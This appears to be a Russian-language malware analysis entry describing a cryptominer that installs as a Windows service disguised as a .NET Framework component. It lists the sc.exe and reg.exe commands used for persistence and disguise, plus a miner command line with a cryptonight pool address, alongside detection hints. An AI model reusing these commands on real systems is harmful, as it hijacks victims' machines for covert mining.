Техническая информация
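Параметры службы HelpSvcsss в реестре (значение 'Start' = 2 соответствует автоматическому запуску службы при загрузке системы):
- [<HKLM>\SYSTEM\ControlSet001\Services\HelpSvcsss] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\HelpSvcsss] 'ImagePath' = '%CommonProgramFiles%\System\alg.exe'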
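Файлы в каталоге %CommonProgramFiles%\System, на которые ссылаются команды ниже (имена alg.exe и WmiApSvr.exe имитируют системные компоненты Windows alg.exe и WmiApSrv.exe, которые штатно находятся в <SYSTEM32> и <SYSTEM32>\wbem; нетипичный каталог и перестановка букв в имени служат признаками для обнаружения):
- %CommonProgramFiles%\System\WmiApSvr.exe
- %CommonProgramFiles%\System\alg.exe
- %CommonProgramFiles%\System\Setup.bat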
- ClassName: 'EDIT' WindowName: ''
- '%CommonProgramFiles%\System\alg.exe'
- '<SYSTEM32>\cmd.exe' /c ""%CommonProgramFiles%\System\Setup.bat" "
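- '<SYSTEM32>\sc.exe' create HelpSvcsss binPath= "%CommonProgramFiles%\System\alg.exe" start= auto displayname= "Microsoft .NET Framework v2.0"
- '<SYSTEM32>\sc.exe' Description HelpSvcsss "Microsoft .NET Framework v2.0 Optimization Service"
  (Отображаемое имя и описание выдают службу за компонент Microsoft .NET Framework; при проверке следует сопоставлять имя службы HelpSvcsss с путём образа, который находится вне <SYSTEM32>.)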
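- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\HelpSvcsss\Parameters /v Application /t REG_SZ /d "WmiApSvr" /f
- '<SYSTEM32>\reg.exe' add HKLM\SYSTEM\CurrentControlSet\Services\HelpSvcsss\Parameters /v AppParameters /t REG_SZ /d "-a cryptonight -o stratum+tcp://pool.usa-138.com:443 -u 49e9B8HxzSbMWsNbMs72aVe78U9CCE2DAM5aDJYNe...
  (Значение AppParameters в источнике обрезано. По форме это командная строка майнера: алгоритм cryptonight, адрес пула по протоколу stratum+tcp и идентификатор учётной записи после -u. Параметры Application и AppParameters в подразделе Parameters характерны для служб-обёрток; по-видимому, alg.exe запускает WmiApSvr с этими аргументами — требует подтверждения по образцу.)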
- '<SYSTEM32>\sc.exe' start Helpsvcsss